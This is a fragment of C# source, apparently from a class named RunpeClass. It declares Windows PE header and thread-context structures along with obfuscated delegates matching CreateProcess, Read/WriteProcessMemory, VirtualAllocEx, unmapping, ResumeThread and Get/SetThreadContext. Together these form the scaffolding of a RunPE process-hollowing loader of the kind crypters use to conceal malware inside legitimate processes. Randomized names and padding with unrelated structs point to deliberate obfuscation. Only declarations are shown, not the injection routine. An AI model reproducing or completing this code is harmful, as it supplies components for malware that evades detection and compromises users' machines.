byte Sbz1; public short AclSize; public short AceCount; public short Sbz2; } public struct POINTAPI6 { public int x; public int y; } public struct ACL3 { public byte AclRevision; public byte Sbz1; public short AclSize; public short AceCount; public short Sbz2; } public struct ACL5 { public byte AclRevision; public byte Sbz1; public short AclSize; public short AceCount; public short Sbz2; } public struct LARGE_INTEGER { public int lowpart; public int highpart; } public struct PALETTEENTRY { public byte peRed; public byte peGreen; public byte peBlue; public byte peFlags; } public struct COORD { public short x; public short y; } public struct EVENTLOGRECORD { public int Length; public int Reserved; public int RecordNumber; public int TimeGenerated; public int TimeWritten; public int EventID; public short EventStructure; public short NumStrings; public short EventCategory; public short ReservedFlags; public int ClosingRecordNumber; public int StringOffset; public int UserSidLength; public int UserSidOffset; public int DataLength; public int DataOffset; } public struct RECT { public int Left; public int Top; public int Right; public int Bottom; } public struct WAVEHDR { public string lpData; public int dwBufferLength; public int dwBytesRecorded; public int dwUser; public int dwFlags; public int dwLoops; public int lpNext; public int Reserved; } public struct POINTAPI7 { public int x; public int y; } public struct CANDIDATEFORM { public int dwIndex; public int dwStyle; public RunpeClass.POINTAPI ptCurrentPos; public RunpeClass.RECT rcArea; } public struct RECT3 { public int Left; public int Top; public int Right; public int Bottom; } public struct POINTAPI1 { public int x; public int y; } public struct COMPOSITIONFORM { public int dwStyle; public RunpeClass.POINTAPI ptCurrentPos; public RunpeClass.RECT rcArea; } public struct POINTAPI2 { public int x; public int y; } public struct MIDIHDR { public string lpData; public int dwBufferLength; public int dwBytesRecorded; public int dwUser; public int dwFlags; public int lpNext; public int Reserved; } public struct MIDIINCAPS { public short wMid; public short wPid; public int vDriverVersion; public string szPname; } public struct MIXERCONTROLDETAILS { public int cbStruct; public int dwControlID; public int cChannels; public int item; public int cbDetails; public int paDetails; } public struct MIXERCAPS { public short wMid; public short wPid; public int vDriverVersion; public string szPname; public int fdwSupport; public int cDestinations; } public struct MIXERCONTROL { public int cbStruct; public int dwControlID; public int dwControlStructure; public int fdwControl; public int cMultipleItems; public string szShortName; public string szName; public int[] Bounds; public int[] Metrics; } public struct MIXERLINECONTROLS { public int cbStruct; public int dwLineID; public int dwControl; public int cControls; public int cbmxctrl; public RunpeClass.MIXERCONTROL pamxctrl; } public struct Context { public uint Flags; public uint D0; public uint D1; public uint D2; public uint D3; public uint D6; public uint D7; public RunpeClass.Save Save; public uint SG; public uint SF; public uint SE; public uint SD; public uint Edi; public uint Esi; public uint Ebx; public uint Edx; public uint Ecx; public uint Eax; public uint Ebp; public uint Eip; public uint SC; public uint EFlags; public uint Esp; public uint SS; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)] public byte[] Registers; } public struct Save { public uint Control; public uint Status; public uint Tag; public uint ErrorO; public uint ErrorS; public uint DataO; public uint DataS; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)] public byte[] RegisterArea; public uint State; } public struct Misc { public uint Address; public uint Size; } public struct SectionHeader { public byte uj62Piq; public RunpeClass.Misc Misc; public uint Address; public uint Size; public uint Pointer; public uint PRelocations; public uint PLines; public uint NRelocations; public uint NLines; public uint Flags; } public struct ProcessInformation { public IntPtr Process; public IntPtr Thread; public int ProcessId; public int ThreadId; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct StartupInformation { public int CB; public string ReservedA; public string Desktop; public string Title; public int X; public int Y; public int XSize; public int YSize; public int XCount; public int YCount; public int Fill; public int Flags; public short ShowWindow; public short ReservedB; public int ReservedC; public int input; public int Output; public int Error; } public struct SecurityFlags { public int Length; public IntPtr Descriptor; public int Inherit; } public struct DosHeader { public ushort Magic; public ushort Last; public ushort Pages; public ushort Relocations; public ushort Size; public ushort Minimum; public ushort Maximum; public ushort SS; public ushort SP; public ushort Checksum; public ushort IP; public ushort CS; public ushort Table; public ushort Overlay; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] public ushort[] ReservedA; public ushort ID; public ushort Info; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)] public ushort[] ReservedB; public int Address; } public struct NtHeaders { public uint Signature; public RunpeClass.File_Header File; public RunpeClass.Optional_Headers Optional; } public struct File_Header { public ushort Machine; public ushort Sections; public uint Stamp; public uint Table; public uint Symbols; public ushort Size; public ushort Flags; } public struct Optional_Headers { public ushort Magic; public byte Major; public byte Minor; public uint SCode; public uint IData; public uint UData; public uint Address; public uint Code; public uint Data; public uint Image; public uint SectionA; public uint FileA; public ushort MajorO; public ushort MinorO; public ushort MajorI; public ushort MinorI; public ushort MajorS; public ushort MinorS; public uint Version; public uint SImage; public uint SHeaders; public uint Checksum; public ushort Subsystem; public ushort Flags; public uint SSReserve; public uint SSCommit; public uint SHReserve; public uint SHCommit; public uint LFlags; public uint Count; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] public RunpeClass.zz_fn5tlr8gno8w7wc8j[] YZvBm2GrvaOfwbe9yyc; } public struct zz_fn5tlr8gno8w7wc8j { public uint Address; public uint Size; } public delegate bool mrqs( string uj62Piq, string command, ref RunpeClass.SecurityFlags process, ref RunpeClass.SecurityFlags thread, bool inherit, uint flags, IntPtr system, string current, [In] ref RunpeClass.StartupInformation startup, out RunpeClass.ProcessInformation info); public delegate bool jx95Iq( IntPtr process, int address, byte[] buffer, int size, out int written); public delegate int i5Ondq( IntPtr process, int address, ref int buffer, int size, ref int read); public delegate IntPtr qh4E( IntPtr process, int address, uint size, uint type, uint protect); public delegate long enx2Ma(IntPtr process, int address); public delegate uint g4Ch(IntPtr thread); public delegate bool evzew(IntPtr thread, ref RunpeClass.Context context); public delegate bool mzt5Dq(IntPtr thread, ref RunpeClass.Context context); } }